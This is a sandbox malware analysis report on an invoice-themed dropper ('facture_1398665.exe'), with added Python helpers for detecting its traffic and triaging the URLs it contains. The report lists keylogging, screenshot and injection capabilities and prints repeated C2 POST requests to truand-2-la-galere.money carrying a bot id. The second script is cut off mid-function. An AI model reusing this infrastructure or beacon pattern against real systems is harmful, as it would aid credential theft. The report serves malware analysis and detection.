
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 549628
Start time: 14:48:31
Joe Sandbox Product: Cloud
Start date: 07.05.2018
Overall analysis duration: 0h 24m 2s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: facture_1398665.exe
Cookbook file name: frenchkeyboardlayout.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.phis.spyw.troj.winEXE@17/110@2/1
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 168
  • Number of non-executed functions: 300
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Set French Keyboard Layout (default)
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): sppsvc.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp, code function 3_2_00434448: GetObjectW, GetDC, CreateCompatibleDC, CreateBitmap, CreateCompatibleBitmap, GetDeviceCaps, GetDeviceCaps, SelectObject, GetDIBColorTable, GetDIBits, SelectObject, CreateDIBSection, GetDIBits, SelectObject, SelectPalette, RealizePalette, FillRect, SetTextColor, SetBkColor, SetDIBColorTable, PatBlt, CreateCompatibleDC, SelectObject, SelectPalette, RealizePalette, SetTextColor, SetBkColor, BitBlt, SelectPalette, SelectObject, DeleteDC, SelectPalette
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp, code function 3_2_0045C584: GetKeyboardState

Networking:

HTTP GET or POST without a user agent
Source: global traffic, HTTP traffic detected (every request goes to the same host and path; the request with Content-Length: 7 was observed 52 times):
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 0 | Cache-Control: no-cache
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 9 | Cache-Control: no-cache
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 0 | Cache-Control: no-cache
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 458 | Cache-Control: no-cache
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 35 | Cache-Control: no-cache
  • POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 7 | Cache-Control: no-cache (52 requests)
Contains functionality to download additional files from the internet
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe, code function 6_2_003824E9: InternetOpenA, InternetConnectA, InternetSetOptionA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Found strings which match to known social media urls
Source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmp, string found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: bhv57BC.tmp.12.dr, strings found in binary or memory:
  • equals www.facebook.com (Facebook): com.facebook, com.facebook.apps, com.facebook.business, com.facebook.code, com.facebook.developers, com.facebook.m, com.facebook.mbasic, com.facebook.mtouch, com.facebook.pixel, com.facebook.research, com.facebook.secure, com.facebook.touch, com.facebook.upload, com.facebook.www, iecompat:touch.facebook.com
  • equals www.twitter.com (Twitter): com.twitter, com.twitter.www
  • equals www.yahoo.com (Yahoo): com.yahoo.edit, com.yahoo.login, com.yahoo.mail, com.yahoo.search, com.yahoo.search.at, com.yahoo.search.br, com.yahoo.search.ca, com.yahoo.search.ch, com.yahoo.search.chfr, com.yahoo.search.chit, com.yahoo.search.cl, com.yahoo.search.co, com.yahoo.search.de, com.yahoo.search.dk, com.yahoo.search.en-maktoob, com.yahoo.search.es, com.yahoo.search.espanol, com.yahoo.search.fi, com.yahoo.search.fr, com.yahoo.search.gr, com.yahoo.search.hk, com.yahoo.search.id, com.yahoo.search.in, com.yahoo.search.it, com.yahoo.search.maktoob, com.yahoo.search.malaysia, com.yahoo.search.mx, com.yahoo.search.nl, com.yahoo.search.no, com.yahoo.search.pe, com.yahoo.search.ph, com.yahoo.search.pl, com.yahoo.search.qc, com.yahoo.search.ro, com.yahoo.search.ru, com.yahoo.search.se, com.yahoo.search.sg, com.yahoo.search.th, com.yahoo.search.tr, com.yahoo.search.tw, com.yahoo.search.uk, com.yahoo.search.ve, com.yahoo.search.vn, iecompat:fantasysports.yahoo.com, iecompat:maktoob.yahoo.com
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, strings found in binary or memory equal to www.yahoo.com (Yahoo): login.yahoo.com, login.yahoo.com0, www.login.yahoo.com0
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for truand-2-la-galere.money
Posts data to webserver
Source: unknown, HTTP traffic detected: POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1 | Host: truand-2-la-galere.money | Content-Length: 0 | Cache-Control: no-cache
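The beacon recorded above (POSTs to truand-2-la-galere.money with no User-Agent, an empty or tiny body, and a 16-hex-digit query string that is also the name of the drop directory under AppData\Roaming) is straightforward to express as detection logic. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses raw HTTP request heads, collects the beacon heuristics, and ties the query id back to the dropped-file paths. The first request text and the dropped-file paths are constructed from what the report shows; the benign browser request and all function names are the author's own assumptions.

```python
"""Flag implant-style HTTP check-ins and correlate them with host artifacts.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Sample input is constructed from the headers and paths the report lists.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample input: the C2 check-in as shown in the report
# (Content-Length: 0) and an ordinary browser request for contrast.
SAMPLE_REQUESTS = [
    "POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1\r\n"
    "Host: truand-2-la-galere.money\r\n"
    "Content-Length: 0\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\r\n"
    "Accept: text/html\r\n\r\n",
]

# Dropped-file paths taken from the report's signature sources.
DROPPED_FILES = [
    r"C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe",
    r"C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp",
]

# A bare 16-hex-digit token as the whole query string, e.g. ?F48A04623C4E0000
BOT_ID_QUERY = re.compile(r"\?([0-9A-Fa-f]{16})$")


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict[str, str] = field(default_factory=dict)  # names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and header block of an HTTP/1.x request head."""
    lines = raw.strip().splitlines()
    method, target, version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():          # blank line terminates the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers)


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Return the reasons a request looks like an implant check-in.

    Each heuristic alone is weak (scripted clients also omit headers);
    the combination is what the report's traffic exhibits.
    """
    hits = []
    if "user-agent" not in req.headers:
        hits.append("no User-Agent header")
    if req.method == "POST" and req.headers.get("content-length") == "0":
        hits.append("POST with empty body (check-in / poll)")
    if BOT_ID_QUERY.search(req.target):
        hits.append("16-hex-digit id as the only query parameter")
    if "accept" not in req.headers:
        hits.append("no Accept header")
    return hits


def correlate_bot_id(req: HttpRequest, dropped_files: list[str]) -> list[str]:
    """Return dropped-file paths that use the request's query id as a
    directory name, linking the network artifact to the host artifact."""
    m = BOT_ID_QUERY.search(req.target)
    if not m:
        return []
    bot_id = m.group(1).upper()
    return [p for p in dropped_files
            if bot_id in (part.upper() for part in re.split(r"[\\/]", p))]


def scan(raw_requests: list[str], dropped_files: list[str]) -> list[dict]:
    """Parse every request and report those with at least one indicator."""
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        hits = beacon_indicators(req)
        if hits:
            findings.append({
                "host": req.headers.get("host", ""),
                "target": req.target,
                "indicators": hits,
                "dropped_files": correlate_bot_id(req, dropped_files),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS, DROPPED_FILES):
        print(f"{f['host']}{f['target']}: {', '.join(f['indicators'])}")
        for p in f["dropped_files"]:
            print(f"  query id also used as directory name in {p}")
```

Run against a proxy or IDS log export one request head at a time; the missing User-Agent is the signature Joe Sandbox fired on, and the directory-name correlation is what turns a network alert into a host-side pivot (the F48A04623C4E0000 drop directory under AppData\Roaming).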
Urls found in memory or binary data
Source: bhv57BC.tmp.12.dr, strings found in binary or memory:
  • file:///C:/Users/user/Desktop/CHIP_Update_pack_32bit.zip
  • file:///C:/jbxinitvm.au3
  • file://192.168.1.2/all/customscript.au3
  • http://acdn.adnxs.com/ast/ast.js
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XAzH.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XAzH?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42rRY.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42rRY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdgjI6.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdgjI6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAfZrQ8.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAfZrQ8?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAlLhfN.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAlLhfN?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WFKz.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WFKz?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WgdR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB5WgdR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H.img?m=6&o=true&u=true&n=true&w=30&h=30
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBj0TsQ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBj0TsQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvEQ3h
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvEQ3h.img
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvF85g
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvF85g.img
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvrNFC
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBvrNFC.img
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBwZC85.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBwZC85?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0CXa.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0CXa?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0K26.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0K26?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0OJl.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0OJl?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Os8.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Os8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Qbo.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Qbo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Snc.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx0Snc?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx13Ya.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBx13Ya?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBxm7t6.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&
  • http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBxm7t6?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jp
  • http://static-hp-eus-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1
  • http://static-hp-eus-s-msn-com.akamaized.net/nl-nl/homepage/_sc/css/f15f847b-3ed230f6/direction=ltr.
  • http://static-hp-eus-s-msn-com.akamaized.net/nl-nl/homepage/_sc/js/f15f847b-f1a914ba/direction=ltr.l
  • http://static-hp-eus-s-msn-com.akamaized.net/sc/9b/e151e5.gif
  • http://static-hp-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1
  • http://static-hp-neu-s-msn-com.akamaized.net/nl-nl/homepage/_sc/css/208e221e-78792e3d/direction=ltr.
  • http://static-hp-neu-s-msn-com.akamaized.net/nl-nl/homepage/_sc/js/208e221e-9935f8da/direction=ltr.l
  • http://static-hp-neu-s-msn-com.akamaized.net/sc/2b/a5ea21.ico
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, string found in binary or memory: http://
Source: firefox.exe.4.dr, strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
  • http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
  • http://crl.thawte.com/ThawteTimestampingCA.crl0
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
  • http://crl3.digicert.com/sha2-assured-cs-g1.crl05
  • http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
  • http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0N
  • http://ocsp.thawte.com0
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, strings found in binary or memory:
  • http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
  • http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
  • http://crl.entrust.net/2048ca.crl0
  • http://crl.entrust.net/server1.crl0
  • http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
  • http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
  • http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
  • http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
  • http://ocsp.comodoca.com0
  • http://ocsp.comodoca.com0%
  • http://ocsp.comodoca.com0-
  • http://ocsp.comodoca.com0/
  • http://ocsp.comodoca.com05
  • http://ocsp.entrust.net03
  • http://ocsp.entrust.net0D
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.8.dr, string found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp, string found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, string found in binary or memory: http://g
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/4e/f3be46.woff
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/9b/e151e5.gif
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/51/fdd733fc193cd8c9207c5338107240.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/65/e8a77758e8644573ba5d41ada16e8c.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/7d/30f1c30a21f2240e5abc7b24a3a057.jpg
Source: bhv57BC.tmp.12.drString found in binary or memory: http://static-hp-neu-s-msn-com.akamaized.net/sc/Homepage/i/b9/688ba69ea7a207af53ba3184ed8c56.jpg
Source: firefox.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/bingbot.htm)
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/bingbot.htm)Q
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.bing.com/favicon.ico
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmp, facture_1398665.tmp, facture_1398665.tmp, 00000003.00000000.12811592110.00401000.00000020.sdmp, facture_1398665.tmp.2.drString found in binary or memory: http://www.innosetup.com/
Source: facture_1398665.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: facture_1398665.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: is-599GA.tmp.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe.4.drString found in binary or memory: http://www.mozilla.com0
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.msn.com/
Source: bhv57BC.tmp.12.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmp, facture_1398665.tmp, facture_1398665.tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmp, facture_1398665.tmp, 00000003.00000002.12831159955.014E1000.00000004.sdmpString found in binary or memory: http://www.test.com/
Source: facture_1398665.exe, 00000002.00000003.12808805294.01380000.00000004.sdmp, facture_1398665.tmp, 00000003.00000003.12813733348.02490000.00000004.sdmpString found in binary or memory: http://www.test.com/(http://www.test.com/(http://www.test.com/
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmpString found in binary or memory: http://www.test.com/1
Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmpString found in binary or memory: http://www.test.com/q
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: http://www.usertrust.com1
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmpString found in binary or memory: https://b
Source: firefox.exe.4.drString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/Q
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpString found in binary or memory: https://truand-2-la-galere.money/admin/nsm.php?F48A04623C4E0000
Source: firefox.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
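The string list above mixes several kinds of URL that deserve very different attention: CA infrastructure pulled out of embedded certificate chains (the trailing "0", "0%", "0C" and similar characters are the DER tag/length bytes that follow the URL inside an X.509 extension, swept up by the string scanner), MSN and Bing page content from the browsing-history artifact bhv57BC.tmp, Inno Setup and RemObjects strings from the installer itself, Mozilla strings from the Firefox build it drops, and, only in the memory of dllhost.exe and the dropped firefox.exe, the one host that matters: truand-2-la-galere.money. Its /admin/nsm.php?F48A04623C4E0000 path carries the same 16-character hex identifier that the Boot Survival and Persistence sections below show as the Startup .lnk name and the %AppData%\Roaming drop directory. The Python below is an added triage helper, not part of the Joe Sandbox report or of any tool it describes: it parses rows in the form shown on this page, attributes each URL to the processes or dropped files it came from, trims the DER residue off hostnames, sorts the noise into categories and leaves the unexplained hosts as C2 candidates with their bot identifier. The category names, the domain lists and the sample rows (copied from this page) are the example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: rows copied from this report in the flattened
# "Source: ... | String found in binary or memory: URL" form (the parser also
# accepts the fused "...drString found..." form the extraction produced).
SAMPLE_ROWS = [
    "Source: bhv57BC.tmp.12.dr | String found in binary or memory: http://www.bing.com/favicon.ico",
    "Source: firefox.exe, 00000006.00000002.12879786681.00D78000.00000004.sdmp, dllhost.exe, "
    "00000008.00000002.13106018989.00193000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%",
    "Source: firefox.exe.4.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(",
    "Source: firefox.exe.4.dr | String found in binary or memory: https://crash-reports.mozilla.com/submit?id=",
    "Source: facture_1398665.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline",
    "Source: facture_1398665.exe, 00000002.00000003.12841468374.01281000.00000004.sdmp | String found in binary or memory: http://www.test.com/1",
    "Source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmp | String found in binary or memory: http://www.nirsoft.net/",
    "Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, "
    "00000008.00000002.13106018989.00193000.00000004.sdmp | String found in binary or memory: https://truand-2-la-galere.money/",
    "Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp | String found in binary or memory: "
    "https://truand-2-la-galere.money/admin/nsm.php?F48A04623C4E0000",
    "Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp | String found in binary or memory: https://b",
]

ROW_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$")
# Longest leading run that looks like a DNS name. Whatever follows it (the "0%" in
# "ocsp.comodoca.com0%") is the DER tag/length byte of the next X.509 field.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")
CA_DOMAINS = ("comodoca.com", "comodo.com", "digicert.com", "digicert.com.my", "entrust.net",
              "thawte.com", "symantec.com", "usertrust.com", "public-trust.com", "diginotar.nl")
BUNDLED_DOMAINS = ("mozilla.com", "mozilla.org")   # strings of the Mozilla build the installer drops
TOOLING_DOMAINS = ("nirsoft.net",)                 # password-recovery utilities often bundled by stealers
BOT_ID_RE = re.compile(r"\?([0-9A-F]{16})$")       # 16-hex query token, as in nsm.php?F48A04623C4E0000


def _split_source(src):
    """Separate process names (memory dumps) from dropped-file artifacts (*.dr)."""
    processes, artifacts = set(), set()
    for tok in (t.strip() for t in src.split(",")):
        if tok.endswith(".dr"):
            artifacts.add(tok)
        elif tok.endswith((".exe", ".tmp")):
            processes.add(tok)
    return processes, artifacts


def _host_of(url):
    m = HOST_RE.match(urlsplit(url).netloc.lower())
    return m.group(0) if m else ""


def _under(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_row(row):
    m = ROW_RE.match(row)
    if not m:
        raise ValueError("not a string-found row: " + row)
    src, url = m.group("src"), m.group("url")
    host = _host_of(url)
    processes, artifacts = _split_source(src)
    if not host:
        cat = "fragment"           # "https://", "https://b": truncated, nothing to pivot on
    elif _under(host, CA_DOMAINS):
        cat = "pki-noise"          # OCSP/CRL/CPS URLs from embedded certificate chains
    elif _under(host, BUNDLED_DOMAINS):
        cat = "bundled-software"
    elif any(a.startswith("bhv") for a in artifacts):
        cat = "browser-cache"      # browsing-history artifact: msn/bing page content
    elif processes and all(p.startswith("facture_") for p in processes):
        cat = "installer"          # Inno Setup / RemObjects strings in the sample itself
    elif _under(host, TOOLING_DOMAINS):
        cat = "tooling"
    else:
        cat = "candidate-c2"       # unexplained host in a process memory dump
    return {"category": cat, "url": url, "host": host,
            "processes": sorted(processes), "artifacts": sorted(artifacts)}


def triage(rows):
    """Bucket every row and collect C2 candidates with the bot identifier they carry."""
    by_cat, c2, bot_ids = defaultdict(list), [], set()
    for row in rows:
        rec = classify_row(row)
        by_cat[rec["category"]].append(rec["url"])
        if rec["category"] == "candidate-c2":
            m = BOT_ID_RE.search(rec["url"])
            rec["bot_id"] = m.group(1) if m else None
            if rec["bot_id"]:
                bot_ids.add(rec["bot_id"])
            c2.append(rec)
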